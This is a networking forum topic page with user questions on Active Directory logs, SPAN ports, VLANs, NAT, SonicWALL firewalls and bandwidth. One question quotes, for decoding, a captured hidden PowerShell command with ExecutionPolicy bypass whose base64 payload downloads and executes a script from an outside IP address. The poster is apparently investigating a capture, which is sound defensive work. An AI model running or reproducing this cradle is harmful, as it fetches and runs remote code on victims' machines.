Network Analysis

9K

Solutions

12K

Contributors

Network analysis is the process of identifying and remediating the processes and systems within a network, including performance, connectivity and security. The process is performed through the use of tools developed for monitoring and analyzing network activity. Network problems that involve finding an optimal way of doing something are studied under the name combinatorial optimization. Examples include network flow, shortest path problem, transport problem, transshipment problem, location problem, matching problem, assignment problem, packing problem, routing problem, Critical Path Analysis and PERT (Program Evaluation & Review Technique).

Share tech news, updates, or what's on your mind.

Sign up to Post

Experts,

I could be logged into my system and looking at real time logs of our active directory logs from our Splunk system.
Not touching my keyboard I see event ID 4624 trickle in for me. It's almost like it's every 7-8 minutes.  What's the reason
AD would constantly report 4624 on a user when they are not doing any logging in? It makes making sense of the logs useless when you
want to identify how many times a user logs into their computer in a day.
0
Introducing Cloud Class® training courses
LVL 12
Introducing Cloud Class® training courses

Tech changes fast. You can learn faster. That’s why we’re bringing professional training courses to Experts Exchange. With a subscription, you can access all the Cloud Class® courses to expand your education, prep for certifications, and get top-notch instructions.

Hi,

We configured a SPAN port in a Cisco switch to be used for an upcoming network analysis solution but we need to make sure that it is functioning before implementation date.
What is best method to test a SPAN port ?

Thanks
0
If you have two Internet feeds with BGP attracting traffic to your site and one goes out - should that interfere with ongoing uploads?
Say I had 200 uploads via sftp to my site. Provider A does some maintenance but Provider B stays up. Traffic load drops to 50
uploads. Since the connections are TCP/SFTP I would think they would just pause and then continue once the available path became
available. Or is it the case that the reconvergence/hold down timers are likely just too long to keep most of those conversations
alive?
0
Would it be beneficial mixing up different switches models in the same office.  For example we're using C3850 access switches and need to add few more to cover the entire office.
Cisco recommends going with new C9300 for the access layer.  Would it create some operational issues?  I like to keep a consistency but like to evaluate a potential upgrade.
Advice?
0
We have a customer who has issues with their Lan environment being slow.

Is there a free tool out there or even a trial out there that would monitor the bandwidth and maybe even ping the devices on the network to see which device might be the root cause. Like a bad switch for example.
0
Would someone decode this base64 for me? I used to be able to decode this but now I can't seem to get it working. It was taken from a payload of a wireshark packet capture.


JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==


The complete string is:

      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
0
I have a Seagate Central NAS drive at home and it has been working fine until just recently.

I can no longer connect to the NAS contents through Windows Explorer; I see it listed on network items but am unable to view the contents. I am able to connect to the Seagate Manager which shows me the IP address connection, users etc etc; I can change its name and it is reflected in Windows Explorer which shows that it is connected to the network.

I have read that it is something to do with Server Message Block v1 (SMB v1) settings which have been updated in Windows 10. I have tried updating the firmware on the NAS but it says it is already running latest firmware.

Any suggestions for overcoming this?? NAS holds all of our files; documents, music, photos etc.
0
We have a Technicolor Modem/wireless router combo device given by Spectrum.  When Spectrum tech first set it up I could connect to is wirelessly and I could see the public wan IP as ie. 1.2.3.4.  We plugged it into our Sonicwall device and everything is working fine.  Bridge mode is enabled and we have a dynamic public ip so I set it to DHCP.   I just want to know why  I'm getting a address of 192.168.0.5 showing on my WAN.  I was expecting to see the public ip instead like 1.2.3.4.

Wan interface
Capture2.PNG
0
From a best practice standpoint which is better, ASA on the edge or a router on the edge of your network?


off of the top of my head ASA on the seem like a better design, however, I have seen some networks in the passed with Router(Edge) then ASA.
0
Hello gents

can you advise a simple tool for bandwith Calculator for A client who is looking to migrate to office 365 ?

I am looking for calculator for (Exchange Online , Skype For Business and Sharepoint )

Thx
0
Cloud Class® Course: C++ 11 Fundamentals
LVL 12
Cloud Class® Course: C++ 11 Fundamentals

This course will introduce you to C++ 11 and teach you about syntax fundamentals.

Hi,

I have a Cisco 890 with IOS 15. Please help me solve the following two problems related to NAT.

1. I would like to access a NVR from both inside and outside the network using the same public IP.
2. I would like to access internal VLANs without any NAT between them.

If I configure ip nat enable, the first problem gets solved but the second does not.
If I configure ip nat inside/outside, the second problem gets solved but the first one does not.

Following is the configuration.

interface Null0
 no ip unreachables
!
interface ATM0
 no ip address
 shutdown
 no atm ilmi-keepalive
!
interface BRI0
 no ip address
 encapsulation hdlc
 shutdown
 isdn termination multidrop
!
interface Ethernet0
 no ip address
 shutdown
!
interface GigabitEthernet0
 switchport mode trunk
 no ip address
!
interface GigabitEthernet1
 switchport access vlan 10
 no ip address
!
interface GigabitEthernet2
 switchport access vlan 10
 no ip address
!
interface GigabitEthernet3
 switchport access vlan 10
 no ip address
 spanning-tree portfast
!
interface GigabitEthernet4
 switchport access vlan 10
 no ip address
 spanning-tree portfast
!
interface GigabitEthernet5
 switchport access vlan 10
 no ip address
 spanning-tree portfast
!
interface GigabitEthernet6
 switchport access vlan 10
 no ip address
 spanning-tree portfast
!
interface GigabitEthernet7
 switchport access vlan 10
 no ip address
 spanning-tree portfast
!
interface …
0
Hardware:
- (1) Cisco SG250 26P PoE switch
- (2) Ruckus WiFi ZoneFlex R610 access points (using their Unleashed setup)

I'm about to create/implement my first VLAN's, I'm pretty stoked I finally get to play with VLAN's. I've been doing IT/networking since 1991 but never did VLAN's. I've configured Sonicwall firewalls from scratch but this is my first Cisco device I get to admin; thankfully it has a GUI. I've already researched the heck out of VLAN's, trunk ports, tagging, & more, & I feel I'm ready to do it. I have the freedom to create this new network as if it were the original network built for this office. Almost all the employees are out of town for next week so it's an ideal time to build a new network. There are no Windows servers or any network services on this WiFi network; all that stuff is on the "corporate" network. This WiFi network I'm replacing/upgrading is what could be referred to as a "rogue" network that this department installed themselves just so they'd have faster Internet.

I'm creating VLAN's so our business can separate the Guest WiFi traffic to its own VLAN but also allow some inter-VLAN routing to allow our screen-sharing solution (Airtame) that guests will be using to talk to our big screens in the conf rooms, which will remain on our internal/business VLAN.

We currently have a Netgear Orbi Pro WiFi network setup but that's not quite robust/sophisticated enough for what we need to do. I'm keeping this existing Orbi WiFi network hardware …
0
What would a good "Gap Analysis" look like? I had a recruiter call and they needed someone with a bunch of networking experience.
But the 10 month long gig was to travel to their various offices and data centers around the world and do a "gap analysis". It sounds
intriguing enough. I just wondered if anyone had an example document or general thoughts as to what the output of such a
project/assignment would look like in the end. ??
0
We are noticing some really odd slow down when we use our ERP system ( hosted inside our networks) and syncing using Smart Connect with Dynamics 365. When a user enters information into our ERP system schedulers are run every 5 minutes through smart connect and ideally should update the Dynamics 365 pages at its slowest 5 minutes or so, but the updates at times are taking 10-30 minutes to populate back to the Dynamics 365 page.

Is there any software I can monitor the passes through and see at where process the times takes the longest. It could be how our smart connect is configured however there are too many variable right off the start.

Our ISP is 10mbs\10mbs. with a Sonicwall Firewall in between.
0
In Wireshark is there a way I can filter for SERVER HELLO packets on the TLSv1.2 protocol?
0
Brief: SonicWALL IP Spoof on WAN from Similar Subnet.

While this article seems like the resolution doing what it detailed did not resolve the issue:
https://www.experts-exchange.com/questions/2856328/Dell-Sonicwall-IP-Spoof-Detec tion.html

I have a Unifi Controller behind a SonicWALL.
We have multiple sites we control from it.

If the site is on a static IP from the same ISP (only 2 ISPs in town) and has the same first 3 octets the traffic passes fine.
Example:
Server site WAN IP: 50.50.50.15
Client site WAN IP: 50.50.50.230

However if a site is on a different octet then they cannot communicate due to "IP Spoofing" detection.
Example
Servers site WAN IP: 50.50.50.15
Client site WAN IP: 50.50.45.59

I've talked with SonicWALL and their engineers are working to find a resolution but I don't know if they can come up with anything.

The server site ISP WAN IP is a /30 net mask.
0
Got called in to look at a very strange network the other day...  They were running a business off a (A) Linksys E2500 home wireless router.  Now off of this router is one cable going to a (B) Mako dual wan appliance, which then goes to a (C) Cybera appliance which hosts a VPN connection as well as a (D) Cisco RV042 router.  Now the other cable off the original router goes to another (E) E2500 Linksys router which only has a laptop and provides wireless to a printer and cell phones for employees.  

Now router (A) is controlling PPPoE from a bridged DSL modem.  Router (A) IP is 192.168.1.1 and servicing everything via DHCP (This will change in near future).  Router (E) acting as an access point is also LAN IP of 192.168.1.1 and handing out DHCP.  The laptop connected to (E) also has a secondary NIC via USB that connects to some point in the other side of the network.  The Mako fails over to secondary ISP (Cellular) after only a few minutes and generally won't return.  I believe either the laptop router (E) is creating the problem.  Router (A) is experiencing over 2,000ms latency and over 5% packet loss.  So I removed router (A) and reconfigured the DSL modem to handle the PPPoE and this now becomes router (A) in the equation.  This router is set to 192.168.0.1 and has around 25ms latency with less than 2% packets loss and everything works great!  We are keeping an eye on this for a week or so, before any more changes are made.

Eventually the Mako should be the router and…
0
Ok so satellite office connect to main office via 100mbs fibre line

SQL 2012 box at main office runs our practice management system called ALB by a company One-advance.

Clients connects directly onto the SQL server which basically stores client information and is used to produce documents. It can take up to 40secs to save a simple word doc via the application. Is this normal?

I’ve used performance counters on the SQL box and disc access seems fine - if I perform same action on same LAN as server it also fine and fine if accessed via RDS

I am at a lost as to where to start or what to suggest

Is this an SQL issue or network or application?
0
I have been ask by PCI QSA regarding what is SonicWALL using for PCI industry hardening standard.

I have been searching the internet and talking to SonicWALL support but couldn’t get the answer. So I will try here.

Anyone know this information or any PCI expert here that can tell me what to do with PCI Req 2.2 regarding system hardening standards?

Please advise.

Thank you
0
Cloud Class® Course: Microsoft Office 2010
LVL 12
Cloud Class® Course: Microsoft Office 2010

This course will introduce you to the interfaces and features of Microsoft Office 2010 Word, Excel, PowerPoint, Outlook, and Access. You will learn about the features that are shared between all products in the Office suite, as well as the new features that are product specific.

I have SonicWALL Firewall/Router and 5 public IP address. I am going to have 1G Fios connection soon; however, the my soniwall won't give the 1G connection speed due to the DPI.
I would like to create second network that outside of firewall and wondering if I can split by public IP address with separate router.  Do you have any solution for this?
0
I have a 20/100 internet connection. Im mirroring a couple NAS in a remote location, but its hogging my entire network connection. How do I limit that incoming connection to use only about half my bandwidth? Can this be done with ddwrt? Netgear etc? Im using Synology NAS and I know the particular port that is being used is 9960. I would image there was a way to say everything coming in on port 9960 has a quota of 50mps or something like that.
0
So my sonicwall 3600 went down. Sonicwall sent a replacement. I uploaded the saved configuration into the replacement and didn't notice any problems.

The next day, users say they can't access the VPN. After a half day talking to Sonicwall support, we figured out that users cannot access the VPN using their UPN as they used to on the old 3600 but can access it using their SAM.

L2TP / IPSEC with RADIUS (NPS) authentication. Funny thing is, the RADIUS server shows success (reasoncode 0) with both the UPN and SAM. Sonicwall's "Test" area in RADIUS shows Success when testing with UPN.

Thanks in advance!
0
General concept of openVPN solution for private network. I'm thinking about layer2 bridging mode but... I have one VPS server with Ubuntu 16.04LTS, one local network and two mobile pcs. Starting from server - there is one Ethernet controller with public static IP address. I want to connect to them from 3 places. Should I create 3 TAP interfaces? What about the bridge - bridging eth with TAP(s) or only TAPs from network for example 192.168.2.0/24. Next computer is PC in local network also with one Ethernet controller with address from network 192.168.2.0/24 and Gateway 192.168.2.1. Additionaly two laptops with two network cards, one used for internet access with local address from network 192.168.2.0/24. Have I config TAP and bridge with network card unused or used to connect to internet (WLAN + home WiFi router). I would like to see every computer like in local network, use configured in local network DHCP, DNS (not obliogatory - can be static), used sharing folders, printers, active directory, connect to domain, use DFS. When I trying TUN IP packet routing i probably had wrong configuration but forcing DNS from VPN was disconnecting me from DFS service.
Any help please - routing or bridging and config of TUN/TAPs interfaces with ethernets and Bridges.

Thank You

Paweł
0
I did a speed test from several speed test sites for my 1 gig Internet circuit and my download and upload are so different. The upload seems fine but the download is so off. It never passes 250Mbps. I have another 300 Mbps with another ISP and when I tested it with the speedtest sites, the download and upload are almost the same, around 250Mbps.
The tech was onsite and tested with his test set and he said that he gets around 900Mbps upload and download.
How do I explain this? Can I trust the 1G circuit provider? What is the explanation for the speedtest sites reported big differences between download and upload.

Any thoughts? Thanks
0
Need the networking experts here!

setting up 802.1x this week, going onsite tomorrow for a quick recce. what are the prerequisites to look for? Servers to install NPS  on etc.

thanks in advance
0

Network Analysis

9K

Solutions

12K

Contributors

Network analysis is the process of identifying and remediating the processes and systems within a network, including performance, connectivity and security. The process is performed through the use of tools developed for monitoring and analyzing network activity. Network problems that involve finding an optimal way of doing something are studied under the name combinatorial optimization. Examples include network flow, shortest path problem, transport problem, transshipment problem, location problem, matching problem, assignment problem, packing problem, routing problem, Critical Path Analysis and PERT (Program Evaluation & Review Technique).